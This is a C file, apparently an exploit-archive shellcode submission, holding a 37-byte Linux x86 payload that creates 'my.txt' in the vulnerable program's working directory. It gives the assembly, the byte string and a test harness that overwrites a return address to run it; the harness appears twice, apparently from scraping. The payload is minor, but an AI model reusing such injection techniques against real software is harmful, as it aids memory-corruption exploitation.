58 lines
No EOL
887 B
C
58 lines
No EOL
887 B
C
/*
|
|
#Title: Create 'my.txt' in present working directory of vulnerable software
|
|
#Length: 37 bytes
|
|
#Date: 3 April 2015
|
|
#Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+)
|
|
#Tested On: kali-linux-1.0.6-i386
|
|
|
|
|
|
|
|
|
|
Section .text
|
|
global _start
|
|
|
|
_start:
|
|
push byte 8
|
|
pop eax
|
|
jmp short GoToCall
|
|
shellcode:
|
|
pop ebx
|
|
xor edx, edx
|
|
mov [ebx + 6], dl
|
|
push word 0544o
|
|
pop ecx
|
|
int 0x80
|
|
|
|
push byte 1
|
|
pop eax
|
|
xor ebx, ebx
|
|
int 0x80
|
|
|
|
|
|
GoToCall:
|
|
call shellcode
|
|
db 'my.txtX'
|
|
|
|
|
|
This shellcode can generalized by using of absolute path instead of 'my.txt'
|
|
*/
|
|
|
|
char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
|
|
"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
|
|
"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
|
|
"\x78\x74\x58";
|
|
|
|
int main()
|
|
{
|
|
int *ret;
|
|
ret = (int *)&ret + 2;
|
|
(*ret) = (int)shellcode;
|
|
}
|
|
|
|
|
|
int main()
|
|
{
|
|
int *ret;
|
|
ret = (int *)&ret + 2;
|
|
(*ret) = (int)shellcode;
|
|
} |